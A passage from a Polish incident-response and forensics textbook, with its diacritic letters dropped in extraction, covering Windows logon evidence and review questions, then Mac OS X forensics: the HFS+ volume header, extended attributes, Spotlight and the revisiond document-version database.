terminalowych Meneder sesji lokalnej usug terminalowych (EID 21, 23, 24)
uytkownik, domena, rdowy adres IP. Oba rejestrowane
w systemie, do ktrego uzyskiwano dostp dla kont lokalnych
i systemie, do ktrego uzyskiwano dostp + dane w kontrolerze
domeny dla kont domenowych
Rejestr klucze MRU Klucz MRU klienta serwera terminali w systemie rdowym
System plikw Utworzenie katalogu profilu uytkownika
(np. C:\users\[nazwauytkownika]) i powizanych podkatalogw
oraz gazi rejestru przy pierwszym interaktywnym logowaniu
przez konto. Modyfikacja kluczy rejestru i plikw w profilu
uytkownika podczas interaktywnej aktywnoci konta
Kto zalogowa si przez sie w systemie?

Ktrego dnia i o ktrej godzinie dany uytkownik zalogowa si w systemie?

Dzienniki zdarze Zdarzenia udanych i nieudanych prb logowania przez sie (typ 3.).
dziennik zabezpiecze Dane rejestrowane w systemie, do ktrego uzyskiwano dostp
dla kont lokalnych i do ktrego uzyskiwano dostp + dane
w kontrolerze domeny dla kont domenowych. Wpis zdarzenia
moe zawiera rdowy adres IP.
Wpis zdarzenia Prba logowania przy uyciu jawnych powiadcze
moe zawiera nazw docelowego systemu i uytkownika
(generowane tylko, jeli uytkownik uwierzytelni si
w interesujcym go systemie za pomoc innych danych
powiadczajcych tosamo ni w sesji logowania w systemie
rdowym)
Dzienniki zdarze Zdarzenia uruchomienia i zatrzymania usugi (EID 7035, 7036)
dziennik systemowy dla znanych narzdzi dostpu zdalnego, takich jak PsExec
Rejestr klucze MRU Klucze te w systemie rdowym mog wskazywa zamontowany
i ShellBags udzia sieciowy
Pami Pozostaoci po poleceniach konsoli w pamici procesw csrss.exe
i conhost.exe w systemie rdowym
I CO Z TEGO
Windows jest najczciej uywanym w rodowiskach korporacyjnych systemem operacyjnym na
wiecie. Rzadko spotykamy si z przypadkami, w ktrych lady dziaalnoci hakera nie prowadz
przez przynajmniej kilka systemw Windows nawet jeli system wyjciowy (lub docelowy)
jest inny. Istnieje wiele specjalistycznych narzdzi uatwiajcych i automatyzujcych prac
informatykw ledczych w systemach Windows. Jednak znajomo podstawowych rde
dowodw istniejcych w tych systemach, jak rwnie sposobw ich powstawania i obsugi,
jest niezbdna kademu analitykowi. W rozdziale tym staralimy si pobienie przedstawi jak
najwicej takich rde materiau dowodowego mamy nadziej, e wykorzystasz te informacje
do dalszego rozwijania i pogbiania swojej wiedzy oraz umiejtnoci analitycznych.
PYTANIA
1. Ktry atrybut tabeli MFT zawiera znaczniki czasu, ktrych nie mona modyfikowa
bezporednio za pomoc funkcji interfejsu API systemu Windows?
2. Jaki artefakt systemu plikw NTFS, dotyczcy katalogu, moe zawiera metadane dotyczce
usunitych plikw?
3. Jakie warunki musi spenia plik, aby by rezydentny w tabeli MFT?
4. W jaki sposb haker moe zaadowa i wykona szkodliwy kod z alternatywnego strumienia
danych w systemie Windows 7?
5. Jakie nazwy plikw mona zdoby dziki analizie zawartoci pliku pobierania
z wyprzedzeniem danej aplikacji?
6. Haker czy si z niechronion usug udostpniania ekranu WinVNC w stacji roboczej.
Aktualny uytkownik jest wylogowany, wic haker musi poda prawidowe dane
powiadczajce. Jaki typ logowania zostanie zarejestrowany w tym przypadku?
7. Haker montuje udzia ADMIN$ na zdalnym serwerze, aby zdalnie zaplanowa zadanie
za pomoc polecenia at. Jaki typ logowania zostanie zarejestrowany w tym przypadku?
8. Jakie rdo dowodw rejestruje nazw uytkownika, ktry utworzy zadanie zaplanowane?
9. Czym rni si dane z bufora danych o zgodnoci aplikacji (ShimCache) od danych
z plikw pobierania z wyprzedzeniem?
10. Jakie klucze rejestru mog zawiera informacje o katalogach uywanych poprzez
Eksploratora Windows podczas interaktywnej sesji? Jakie metadane s przechowywane
w wartociach tych kluczy?
11. Czym rni si dane z kluczy UserAssist od danych z kluczy MUICache?
12. Wymie dwa mechanizmy utrwalania niewymagajce uywania rejestru.
ROZDZIA 13.
Prowadzenie
czynnoci ledczych
w systemach Mac OS X
W
rozdziale 12. napisalimy, e prowadzenie czynnoci ledczych w systemach Windows
to trudne zadanie, ale analiza na ywo i badanie obrazw systemu Mac OS X wcale
nie jest atwiejsze. Na temat kadego z tych rodowisk mona napisa ca ksik.
Dlatego w rozdziale tym pragniemy przedstawi tylko podstawowe rda dowodw, ktre s
najczciej przydatne podczas dziaa zwizanych z reagowaniem na incydenty bezpieczestwa
komputerowego. Od czasu ukazania si poprzedniego wydania tej ksiki na pocztku XXI wieku
systemy firmy Apple znacznie zyskay na popularnoci w rnych organizacjach oraz przestay by
domen dziaw marketingu i artystycznych. Rwnolegle z t ekspansj nastpi rozwj narzdzi
ledczych.
Rozdzia ten podzielilimy na kilka podrozdziaw zawierajcych opisy niektrych najbardziej
wartociowych rde informacji. Z oczywistych powodw nie opisujemy wszystkich potencjalnych
rde danych w systemach Mac OS X, ale w kadym podrozdziale przedstawiamy nieco
podstawowych wiadomoci na wybrany temat. Oto lista omawianych przez nas tematw:
system plikw HFS+,
rdzenne systemowe dane operacyjne,
dane funkcji Spotlight,
kronikowanie systemu i aplikacji,
konfiguracja systemu i aplikacji.
Podobnie jak w rozdziale 12., w rozdziale tym opisujemy rol danych we wspomaganiu
funkcjonalnoci systemu operacyjnego, podpowiadamy, co jest potrzebne do ich pobrania oraz
jak interpretowa i analizowa zebrany materia dowodowy. Pod koniec rozdziau zamiecilimy
podsumowanie wiadomoci o wszystkich opisanych artefaktach wystpujcych w systemach
Mac OS X. Omwilimy metody pobierania danych w ramach analizy na ywo oraz wskazalimy,
czym informacje te rni si od tych, ktre mona zdoby drog normalnej analizy ledczej.
Zaczniemy od podstawowych wiadomoci o systemie plikw w Mac OS X.
SYSTEM PLIKW HFS+ I METODY JEGO ANALIZY

Hierarchiczny system plikw (ang. Hierarchical File System HFS+) wywodzi si z systemu
plikw HFS z 1985 roku. Poniewa w tamtych czasach dyski miay niewielkie rozmiary, z czasem
konieczne byo zaktualizowanie standardu w celu dostosowania go do nowych znacznie szybszych
i pojemniejszych urzdze. System plikw HFS+ zosta wprowadzony do uytku w 1998 roku
i od tamtej pory cay czas jest doskonalony. Obecnie posiada wszystkie funkcje, jakich oczekuje si
od nowoczesnego systemu plikw, np.:
kronikowanie,
twarde cza,
cza symboliczne,
ROZDZIA 13. PROWADZENIE CZYNNOCI LEDCZYCH W SYSTEMACH MAC OS X 401
szyfrowanie,
rozmiar plikw do okoo 8 EB,
rozmiar woluminw do okoo 8 EB,
moliwo zmieniania rozmiarw woluminw,
struktury atrybutowe.
Na licie tej w oczy rzuca si brak macierzystego wsparcia dla plikw rozrzedzonych. S one
powszechne w nowoczesnych systemach plikw, poniewa umoliwiaj efektywne przechowywanie
plikw zawierajcych pust przestrze. Implementacja tego rodzaju plikw w systemie Mac OS X
jest obsugiwana programowo, tzn. przez warstw sterownika wirtualnego systemu plikw systemu
operacyjnego.
Podrozdzia ten zaczynamy od zwizego wprowadzenia do ukadu systemu plikw, po czym
przechodzimy do opisu artefaktw, ktre mog by przydatne podczas czynnoci analitycznych.
Pokazujemy, jak dosta si do rnych struktur za pomoc niskopoziomowych narzdzi systemowych.
Z naszych dowiadcze wynika, e najnowsze wersje znanych pakietw oprogramowania ledczego
do nieprzewidywalnie interpretuj system plikw HFS+. Jeli trzeba tylko przejrze pliki, nie ma
problemu, ale jeeli chcesz zdoby szczegowe informacje, lepiej signij po specjalistyczne narzdzia.
Ukad woluminu
Wolumin HFS+ skada si z dziewiciu struktur blokw rozruchowych, nagwka, pliku alokacji,
pliku przepenie, pliku katalogowego, pliku atrybutw, pliku startowego, alternatywnego nagwka
woluminu oraz blokw zarezerwowanych. Rozmiar blokw alokacji jest okrelany w czasie tworzenia
systemu plikw. Na rysunku 13.1 pokazano ukad elementw wieo sformatowanego dysku.
Ukad ten znacznie rni si od ukadu systemw FAT i NTFS, wic musimy wyjani w nim
kilka rzeczy. Jeli potrzebujesz szczegowych informacji na ten temat, przeczytaj notk techniczn
Apple 1150 pt. HFS Plus Volume Format.
Bloki rozruchowe
Pierwsze 1024 bajty woluminu s zarezerwowane dla blokw rozruchowych, ktre mog zawiera
informacje potrzebne do uruchomienia systemu. Nowoczesne systemy nie wymagaj tych blokw,
wic obejmowana przez nie przestrze jest z reguy pusta, cho program Mac OS Finder moe
zapisa w niej informacje, gdy zmieni si folder systemowy.
Nagwek woluminu i alternatywny nagwek woluminu

Nagwek woluminu zawsze jest ulokowany w odlegoci 1024 bajtw (dwa 512-bajtowe bloki
alokacji) od pocztku woluminu. Zawiera on informacje dotyczce woluminu, np. o lokalizacji
pozostaych struktur. W tabeli 13.1 znajduje si zestawienie zawartoci tego nagwka.
RYSUNEK 13.1. Anatomia dysku
Zwr uwag na pi ostatnich pozycji nagwka woluminu. Zawieraj one informacje o pooeniu
i rozmiarze piciu specjalnych plikw ukazanych na rysunku 13.1. Za pomoc programu iBored,
wieloplatformowej przegldarki danych z funkcj interpretacji i reprezentacji struktur na podstawie
szablonw, mona atwo przejrze te struktury.
Rysunek 13.2 przedstawia zawarto drugiego bloku zawierajcego nagwek woluminu. Dysk
ten zosta utworzony 1 sierpnia 2012 roku oraz by ostatnio modyfikowany 12 kwietnia 2014 roku.
Daty w systemie plikw HFS+ s reprezentowane w postaci liczby sekund, jaka upyna od
pnocy 1 stycznia 1904 roku GMT. Naley te pamita, e zapisana w nagwku data utworzenia
woluminu jest podawana w czasie lokalnym, nie GMT. Wolumin HFS+ moe mie cztery daty:
utworzenia, modyfikacji, utworzenia kopii zapasowej oraz sprawdzenia.
Skoro mowa o znacznikach czasu, system HFS+ zapisuje po cztery daty dla kadego pliku
dat normalnego dostpu, dat modyfikacji oraz daty zmian i-wza. Ponadto rejestrowany
jest czas utworzenia i-wza oznaczajcy czas utworzenia pliku. Podczas analizy systemu na ywo
informacje z tych znacznikw czasu mona wydoby za pomoc polecenia stat. Pamitaj, e czasami
do uzyskania dostpu do danych za pomoc polece potrzebne s zwikszone uprawnienia.
Tabela 13.1. Struktura nagwka woluminu
Nazwa pola Rozmiar Pooenie Opis

signature 2 bajty 0x00 Sygnatura woluminu H+ (48 2B)
version 2 bajty 0x02 Wersja
attributes 4 bajty 0x04 Znaczniki atrybutowe
lastMountedVersion 4 bajty 0x04 Kod ostatnio zamontowanej wersji HFSJ
(48 48 53 4A)
journalInfoBlock 4 bajty 0x0C Blok informacji kronikowych
(jeeli wczone jest kronikowanie)
createDate 4 bajty 0x10 Data utworzenia woluminu (czas lokalny)
modifyDate 4 bajty 0x14 Data modyfikacji woluminu (GMT)
backupDate 4 bajty 0x18 Data utworzenia kopii zapasowej woluminu
(GMT)
checkedDate 4 bajty 0x1C Data sprawdzenia woluminu (GMT)
fileCount 4 bajty 0x20 Liczba plikw
folderCount 4 bajty 0x24 Liczba folderw
blocksize 4 bajty 0x28 Rozmiar bloku alokacji
totalBlocks 4 bajty 0x2C Liczba wszystkich blokw alokacji
freeBlocks 4 bajty 0x30 Liczba wolnych blokw alokacji
nextAllocation 4 bajty 0x34 Nastpna alokacja
rsrcClumpSize 4 bajty 0x38 Rozmiar porcji zasobw
dataClumpSize 4 bajty 0x3C Rozmiar porcji danych
nextCatalogID 4 bajty 0x40 Identyfikator nastpnego wza katalogu
writeCount 4 bajty 0x44 Liczba operacji zapisu (okrela, ile razy
wolumin by montowany)
encodingBitmap 8 bajtw 0x48 Mapa bitowa kodowa
finderInfo 32 bajty 0x50 Informacje Findera
allocationFile 80 bajtw 0x70 Dane podpliku (ang. fork) HFSPlus
plik alokacji
extentsFile 80 bajtw 0xC0 Dane podpliku HFSPlus plik przepenie
catalogFile 80 bajtw 0x110 Dane podpliku HFSPlus plik katalogowy
attributesFile 80 bajtw 0x160 Dane podpliku HFSPlus plik atrybutw
startupFile 80 bajtw 0x1B0 Dane podpliku HFSPlus plik startowy
RYSUNEK 13.2. Nagwek woluminu HFS+
W INTERNECIE
iBored apps.tempel.org/iBored
Alternatywny nagwek woluminu znajduje si zawsze w odlegoci 1024 bajtw od koca

woluminu i zajmuje 512 bajtw. Nagwek ten jest kopi nagwka woluminu suc
do odzyskiwania danych, w przypadku gdy co zego stanie si z tym nagwkiem.
Plik alokacji
Przeznaczenia tego pliku mona domyli si po nazwie jest to rejestr dostpnych blokw
alokacji. Zawiera bit dla kadego bloku. Jeli bit ten jest nieustawiony, znaczy to, e dana
przestrze jest dostpna do uytku.
Plik przepenie
Z kadym plikiem w systemie plikw HFS+ jest zwizana lista rozszerze (ang. extent) czy te
cigych blokw alokacji nalecych do jego podplikw (ang. fork). Kade rozszerzenie definiuje
para liczb pierwsza oznacza blok alokacji rozszerzenia, a druga okrela liczb blokw alokacji
przypisanych do tego rozszerzenia. B-drzewo katalogowe zawiera rejestr omiu pierwszych
rozszerze. Jeli w podpliku jest wicej ni osiem rozszerze, pozostae s przechowywane w pliku
przepenie. Bardziej szczegowy opis podplikw znajduje si w podpunkcie Plik atrybutw.
Plik katalogowy
Plik katalogowy zawiera szczegowe informacje o hierarchii plikw i folderw w woluminie.
Kady plik i folder w woluminie maj wasny katalogowy identyfikator wza (CNID). W przypadku
folderw CNID nazywa si identyfikatorem folderu lub katalogu. W przypadku plikw jest to
identyfikator pliku. Dla kadego folderu i pliku istnieje identyfikator nadrzdny CNID folderu
zawierajcego ten folder lub plik. Pierwszych szesnacie identyfikatorw CNID jest zarezerwowanych
przez firm Apple dla wanych plikw woluminu.
Plik atrybutw
Plik atrybutw to opcjonalna cz standardowego systemu plikw. Jest przeznaczony do uytku
przez podpliki nazwane, ktre mona traktowa jak dodatkowe metadane przypisane do pliku,
nieprzechowywane jako cz samego wpisu pliku. Jest to ten rodzaj funkcjonalnoci, o ktry
chodzio firmie Microsoft przy wprowadzaniu alternatywnych strumieni danych.
Rozszerzone informacje o pliku mona odczyta za pomoc polecenia xattr. W poniszym
przykadzie plik /Users/mpepe/Mail Downloads/geocities_mpepe.pem zosta odebrany przez
uytkownika w zaczniku do poczty elektronicznej wysanej przez Kevina Mandi. Informacje te
zostay zapisane w metadanych przez do niedawno wprowadzon do systemu Mac OS X funkcj
zapisywania miejsca pochodzenia plikw w binarnym formacie plist. Jeli nastpnym razem przy
otwieraniu pliku pobranego za pomoc przegldarki Safari zobaczysz okno, to wanie stamtd
Finder pobiera informacje rdowe.
planck:~ mpepe$ xattr /Users/mpepe/Mail\ Downloads/*.pem
geocities_mpepe.pem: com.apple.metadata:kMDItemWhereFroms:
0000000 62 70 6c 69 73 74 30 30 a3 01 02 03 5f 10 2f 4b |bplist00?..._./K|
0000020 65 76 69 6e 20 4d 61 6e 64 69 61 20 3c 6b 65 76 |evin Mandia <kev|
0000040 69 6e 6d 61 6e 64 69 61 40 40 6d 61 6e 64 69 61 |inmandia@@mandia|
0000060 6e 74 2e 63 6f 6d 3e 5f 10 10 52 65 3a 20 50 6c |nt.com>_..Re: Pl|
0000100 65 61 73 65 20 66 69 78 20 6d 79 20 73 69 74 65 |ease fix my site|

0000120 27 73 20 42 4c 49 4e 4b 20 74 61 67 73 5f 10 35 |'s BLINK tags_.5|
0000140 6d 65 73 73 61 67 65 3a 25 33 43 43 45 31 35 45 |message:%3CCE15E|
0000160 34 30 46 2e 31 41 41 35 25 32 35 6b 65 76 69 6e |40F.1AA5%25kevin|
0000200 6d 61 6e 64 69 61 40 6d 61 6e 64 69 61 6e 74 2e |mandia@mandiant.|
0000220 63 6f 6d 25 33 45 08 0c 3e 51 00 00 00 00 00 00 |com%3E...>Q. ...|
0000240 01 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 |. ..............|
0000260 00 00 00 00 00 00 00 00 00 89 |. ........|
Tylko nieliczne usugi systemu Mac OS X zapisuj dane w podplikach nazwanych. Aby
zobaczy, czego mona si spodziewa po normalnym obrazie systemu plikw, wykonaj polecenie
xattr -lr * w wieej instalacji systemu. Spowoduje to wywietlenie wszystkich rozszerzonych
atrybutw wraz z nazw ich twrcy. Wikszo par klucz-warto, ktre zobaczysz, bdzie
wygenerowana przez com.apple.metadata oraz bdzie zawiera kMDItemDownloadedDate,
kMDItemWhereFroms, kMDItemFinderComment i kMDItemUserTags. Waciciel com.apple.metadata
utrzymuje pewn liczb gotowych obiektw metadanych, ale programici mog te generowa
wasne. Naley zauway, e nazwa twrcy suy gwnie do celw klasyfikacyjnych, a nie okrela
jakiego procesu lub jakiej aplikacji. W prezentowanych przykadach com.apple.metadata
reprezentuje dane pochodzce z aplikacji Safari i Finder. Gdyby kto zmodyfikowa znaczniki pliku
w Finderze, np. zmieniby kolor elementu na zielony albo oznaczy go jako wany w okienku
informacji o pliku, to znaczniki te zostayby zapisane w opisanych wczeniej podplikach nazwanych.
Uwaga Bardziej szczegowe informacje o predefiniowanych obiektach metadanych mona znale

za pomoc wyszukiwarki na stronie http://developer.apple.com dokumentu pt. MDItem Reference.
Poniej znajduje si przykad katalogu Movies po ustawieniu znacznikw Green i Important,

i dodaniu komentarza za pomoc okienka informacji o pliku:
Movies: com.apple.FinderInfo:
00000000 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 |. ..............|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |. ..............|
00000020
Movies: com.apple.metadata:_kMDItemUserTags:
00000000 62 70 6C 69 73 74 30 30 A2 01 02 57 47 72 65 65 |bplist00...WGree|
00000010 6E 0A 32 59 49 6D 70 6F 72 74 61 6E 74 08 0B 13 |n.2YImportant...|
00000020 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 03 |. ..............|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1D |. ..............|
00000040
Movies: com.apple.metadata:kMDItemFinderComment:
00000000 62 70 6C 69 73 74 30 30 5E 54 68 69 73 20 69 73 |bplist00^This is|
00000010 20 61 20 74 65 73 74 08 00 00 00 00 00 00 01 01 | a test. .......|
00000020 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 |. ..............|
00000030 00 00 00 00 00 00 00 17 |. ......|
00000038
Plik startowy
W pliku startowym przechowywane s informacje potrzebne podczas uruchamiania systemu
niemajcego wbudowanych mechanizmw obsugi (ROM) systemu plikw HFS+. System Mac OS X
nie korzysta z tego pliku i w wikszoci przypadkw rozmiar tego pliku wynosi zero bajtw.
Usugi systemu plikw

Firma Apple utworzya i zaadaptowaa na wasne potrzeby kilka technologii o zaawansowanej
funkcjonalnoci. Dwie najwaniejsze funkcje, ktre mog zawiera wane informacje, to Spotlight
(indekser metadanych) i Managed Storage (proces odpowiedzialny za kontrol wersji). Liczba
narzdzi sucych do przegldania danych z tych rde jest mocno ograniczona, ale liczymy
na to, e z czasem si to zmieni.
Spotlight
Spotlight to usuga indeksowania metadanych i wyszukiwania w systemie Mac OS X. Gdy
tworzony jest nowy plik, system szkieletowy Metadata przyjmuje go i indeksuje na podstawie
aktualnie dostpnych wtyczek. Podstawowa instalacja systemu Mac OS X 10.9 zawiera okoo
dwudziestu trzech importerw przetwarzajcych rne formaty plikw, od paczek aplikacji
(ang. application bundles) po poczt. Podczas instalowania nowych programw mog by adowane
nowe importery rozszerzajce moliwoci szkieletu Metadata o funkcje rozpoznawania kolejnych
formatw. Niektre rodzaje importerw importuj tylko metadane, a inne indeksuj cay tekst
przychodzcego pliku. Przykadem tego drugiego rodzaju jest wtyczka importu mail.mdimporter.
W dziaajcym systemie Mac OS X wykonaj polecenie mdfind z acucha do wyszukania. Jeeli
acuch ten znajduje si w pliku, ktrego tre zostaa zaindeksowana, aplikacja mdfind zwrci
kompletn ciek do tego pliku. Indeksy nielokalnych systemw plikw, np. nonikw wymiennych
i udziaw sieciowych, s przechowywane z samymi danymi. Jeeli wolumin jest niepodczony,
program mdfind nie zwrci danych z tego rda.
Oczywicie dla nas najwaniejsze jest to, czy da si jako wykorzysta artefakty przechowywane
lub pozostawione przez system Metadata. Kasowanie starych danych z usunitych plikw to bardzo
szybki proces. Z przeprowadzonych przez nas testw wynika, e wzy w indeksie korespondujce
z usunitym plikiem s usuwane natychmiast. Niestety nie ma aktualnie narzdzi, ktre potrafiyby
niezawodnie przetwarza dane zapisywane przez indekser Spotlight, a pobrane z obrazu dysku.
Aktualnie dane funkcji Spotlight s uyteczne tylko podczas analizy na ywo.
Magazyn zarzdzany
W systemie Mac OS X Lion (10.7) firma Apple wprowadzia nowy system szkieletowy dla
programistw umoliwiajcy aplikacjom utworzonym dla tego systemu i jego nowszych wersji
zaadaptowanie modelu cigego zapisywania dokumentw i plikw zamiast tradycyjnej operacji
zapisywania uruchamianej przez uytkownika. Efektem ubocznym tej decyzji jest pozostawanie
w systemie plikw duej iloci danych zwizanych z modyfikowaniem plikw. Demon zarzdzajcy
t funkcj nazywa si revisiond i przechowuje dane na woluminach w ukrytym katalogu
/.DocumentRevisions-V100.
W katalogu tym usuga zapisuje dane plikowe w katalogu PerUID i bazie danych w db-V1.
Aby przejrze pliki zapisane w systemie wersjonowania, naley otworzy baz danych SQLite
/.DocumentRevisions-V100/db-V1/db.sqlite. W czterech tabelach tej bazy zawarte s informacje
o pliku, wersjach pliku oraz miejscach jego przechowywania. Jeli kto pobiera pliki do przegldu,
musi te skopiowa plik z przyrostkiem w nazwie -wal, ktry jest dziennikiem zapisu z wyprzedzeniem
zawierajcym istotne dane.
W ramach przykadu zbadamy zawarto aktywnego pliku db.sqlite przedstawionego
na rysunku 13.3. Bardziej szczegowy opis metod analizy baz danych SQLite zamiecilimy dalej
w tym rozdziale. Aby dosta si do tej bazy danych, uruchomilimy powok z uprawnieniami root
za pomoc polecenia sudo bash i skopiowalimy pliki do tymczasowego katalogu (~/book_tmp),
aby unikn wycigw do danych spowodowanych otwarciem bazy danych przez wiele procesw.
W INTERNECIE
Do szybkiego przegldania zawartoci baz danych SQLite mona uywa wtyczki do Firefoksa o nazwie
SQLite Manager. Poszukaj jej w menu dodatkw.
RYSUNEK 13.3. Baza danych wersji dokumentw we wtyczce SQLite Manager
Data ostatniego ogldania (file_last_seen) zaznaczonego pliku, Indicators-network.txt,

to 1352657871 (czyli niedziela, 11 listopada 2012 roku, godzina 18:17:51 GMT), a identyfikator
przechowywania tego pliku (file_storage_id) to 47. Przy uyciu tego identyfikatora poszukalimy
rekordw w tabeli generations. Na rysunku 13.4 pokazano czternacie wersji tego pliku. Pierwszy
wpis jest opatrzony takim samym znacznikiem czasu jak data utworzenia. Drugi wpis wskazuje,
e plik by edytowany w rod 21 listopada 2012 roku o godzinie 19:31:12 GMT.
RYSUNEK 13.4. Wersje dokumentu Indicators-network.txt
Uwaga Przypominamy, e system Mac OS X powsta na bazie systemu BSD, wic wszelkie uywane w nim
znaczniki czasu oznaczaj liczb sekund, jaka upyna od epoki Uniksa (00:00:00 UTC, 1 stycznia
1970 roku). Znaczniki te mona konwertowa za pomoc uniksowego polecenia date z opcjami
-j -u -r (sekundy). Istnieje te wiele internetowych kalkulatorw, za pomoc ktrych mona
wykona tak sam konwersj.
Drc rekord, mona przeanalizowa nazw pliku wybranej wersji, co pokazano w polu
generation_path ukazanym na rysunku 13.5.
RYSUNEK 13.5. Wersja druga pliku Indicators-network.txt

Nastpnie moemy przej do systemu plikw i przyjrze si plikowi 00E16F9F-81B7-4E6F-

A267-616817DC890D.txt, aby sprawdzi stan w tym czasie. Jako e jest to prosty plik tekstowy, jeli
trzeba, dodatkowo moemy porwna jego rne wersje za pomoc polecenia diff. Oczywicie
pole generation_add_date zgadza si z rekordem HFS+ pliku dla wersji. Jest to kolejna przydatna
informacja, gdy trzeba rozwika zagadk manipulacji przy danych.
PODSTAWOWE DANE SYSTEMU OPERACYJNEGO

Wikszo informatykw ledczych najwicej czasu spdza na pracy z rnymi wersjami systemu
operacyjnego Windows. Przejcie do systemu Mac OS X dla tych osb moe by pocztkowo trudne.
Gdzie szuka ladw w systemie plikw HFS+? Odpowied na to pytanie zaley od uprawnie
uytkownika. Dlatego najpierw przyjrzymy si typowym sposobom korzystania z interesujcego
nas systemu oraz typowej konfiguracji wykorzystywanej przez wikszo uytkownikw.
Ukad systemu plikw

Firma Apple definiuje cztery domeny klasyfikacji danych: lokalne, systemowe, sieciowe
i uytkownika. Kad domen opisuje zestaw cieek, zasobw i kontrolerw dostpu. Domena
lokalna obejmuje aplikacje i konfiguracje wsplnie uywane przez wszystkich uytkownikw
systemu. Do modyfikowania danych w tej domenie potrzebne s uprawnienia administracyjne.
Do domeny lokalnej nale nastpujce katalogi:
/Applications,
/Developer,
/Library.
Domena systemowa obejmuje dane instalowane przez firm Apple oraz kilka specjalistycznych
niskopoziomowych narzdzi. Do modyfikowania plikw z tej domeny potrzebne s uprawnienia
administratora, a nale do niej wszystkie tradycyjne struktury uniksowe: /bin, /usr, /dev, /etc itd.
Ze wzgldu na pooenie dziennikw systemowych domena ta jest najbardziej przydatna podczas
ledztw w sprawie wama. Katalog /System uwaa si za wasno tej domeny.
Trzecia domena to domena sieciowa. Przechowywane s w niej aplikacje i dane wsplnie
uytkowane przez sie systemw i uytkownikw. W praktyce domena ta rzadko zawiera
jakiekolwiek dane. Jest zlokalizowana w katalogu /Network.
Domena uytkownika jest rdem danych przydatnych w wikszoci ledztw. Obejmuje ona
katalogi gwne i wspdzielone. Generalnie w katalogu /Users mona znale ca tre utworzon
przez uytkownika i wszystkie jego ustawienia konfiguracyjne.
Jak napisalimy wczeniej, jeeli uytkownik ma odpowiednie uprawnienia, utworzone przez
niego pliki i aplikacje mog wyamywa si z tego modelu, zwaszcza gdy uytkownik zna si
na systemach uniksowych i zainstaluje dodatkow konsol albo menedera pakietw MacPorts.
Nawiasem mwic, gorco zachcamy do instalacji programu MacPorts w stacjach roboczych
uywanych do pracy z systemami Mac. Za jego pomoc mona w atwy sposb pobra du ilo
pakietw z drzewa BSD Ports do swojego systemu. Pamitaj, e aby uzyska dziaajce drzewo
Ports w swoim rodowisku, musisz zainstalowa programistyczne narzdzia wiersza polece.
Najprostszym sposobem na zapocztkowanie tego procesu jest wykonanie polecenia gcc w wierszu
polece. System dowie si, e narzdzi tych brakuje, i uruchomi odpowiedni instalator. Gdy
znajdziesz narzdzia przydatne w ledztwie, zamiast od razu kompilowa je ze rda, sprawd,
czy kto ju wczeniej nie utworzy pakietu w MacPorts. Jeli tak, zaoszczdzisz troch czasu.
W INTERNECIE
MacPorts www.macports.org
Uwaga Wicej informacji o rodowisku plikowym systemu Mac OS X mona znale w portalu Apple Mac
Developer. Zauwaylimy, e z biegiem lat informacje byy przenoszone midzy rnymi czciami
przewodnika dla programistw. Dlatego poszukaj na stronie http://developer.apple.com dokumentu
zatytuowanego File System Programming Guide dla systemu OS X.
Dalej opisujemy trzy gwne domeny lokaln, systemow i uytkownika oraz rodzaje
danych, jakie mona w nich znale. Pniej omawiamy metody zdobywania i analizy wybranych
artefaktw. Domen sieciow pomijamy, poniewa jest rzadko obecna i podobna do domeny lokalnej.
Domena lokalna
W domenie lokalnej s trzy katalogi, ktre naley zna. Pierwszy to katalog /Applications. S w nim
zainstalowane prawie wszystkie aplikacje (przez uytkownika lub App Store). Nieco dalej opisujemy
sposoby sprawdzania, jakie aplikacje s zainstalowane w systemie, ale najpierw krtka dygresja
na temat paczek aplikacji (ang. Application Bundles).
Paczki aplikacji to struktury katalogowe w standardowym formacie i ze standardowym
rozszerzeniem. Zawieraj prawie wszystko, co jest potrzebne aplikacji do dziaania, tj. kod
wykonywalny, grafiki, pliki konfiguracyjne, biblioteki oraz aplikacje i skrypty pomocnicze.
S bardzo ciekawym sposobem dystrybucji aplikacji, poniewa Finder traktuje te struktury jak
pojedynczy plik z interfejsem, chyba e zaznaczy si inaczej. Najczciej spotykane rozszerzenia
paczek aplikacji to:
.app aplikacje z moliwoci uruchamiania,
.framework dynamiczne biblioteki wsplne i ich zasoby,
.plugin aplikacje pomocnicze lub sterowniki dla innych aplikacji,
.kext dynamicznie adowane moduy jdra.
Gdyby otworzono paczk aplikacji za pomoc opcji Show Package Contents (poka zawarto
pakietu) w Finderze lub podczas przegldania katalogw w terminalu, znaleziono by folder
Contents z kilkoma podkatalogami. Podkatalogi te MacOS i ewentualnie Resources, Library,
Frameworks, Plugins oraz SharedSupport zawieraj wymienione wczeniej elementy.
Programista moe w nich umieci wszystko i najczciej s to przydatne narzdzia oraz pliki.
Przykadowo w folderze Library w paczce VMWare Fusion znajduj si wszystkie narzdzia wiersza
polece do zarzdzania hiperwizorem VMWare. Na rysunku 13.6 przedstawiono przykadow
zawarto paczki aplikacji Console doczanej do systemu Mac OS X, ktr wcza si przez
kliknicie z przytrzymaniem klawisza Control pliku i wybranie opcji Show Package Contents
z menu kontekstowego.
RYSUNEK 13.6. Przykadowa zawarto paczki aplikacji
Na rysunku tym wida, e Console.help to paczka pomocnicza (ang. Help Bundle), czyli paczka
umieszczona w innej paczce. Jeli trzeba, mona przejrze take jej zawarto, ktra ma tak sam
struktur jak kada inna paczka aplikacji.
Czemu o tym wszystkim piszemy? W paczce mog znajdowa si dodatkowe metadane
przydatne w ledztwie. Ze znacznikw czasu mona si dowiedzie, kiedy dany program zosta
zainstalowany. Ponadto programy pomocnicze pozwalaj zorientowa si, jak dziaa dana
aplikacja. Poza tym jest to doskonae miejsce do ukrywania danych.
Wracamy do domeny lokalnej: w katalogu Applications mona znale jeszcze dwa inne
katalogi. rodowisko programistyczne firmy Apple wykorzystuje folder Developer. Do niedawna
w katalogu tym na dysku gwnym przechowywane byy wszystkie narzdzia programistyczne,
pakiety SDK, dokumentacja i narzdzia diagnostyczne. W nowszych wersjach XCode miejsce
przechowywania narzdzi zmienio si, cho nadal mona jeszcze spotka ten folder.
Ostatni interesujcy nas w domenie lokalnej katalog to /Library. Podczas badania systemu
plikw mona go znale w rnych miejscach. Generalnie w jego podkatalogach przechowuje si
rne zasoby aplikacji, zalene od zakresu, np. ustawienia aplikacji dla systemu operacyjnego
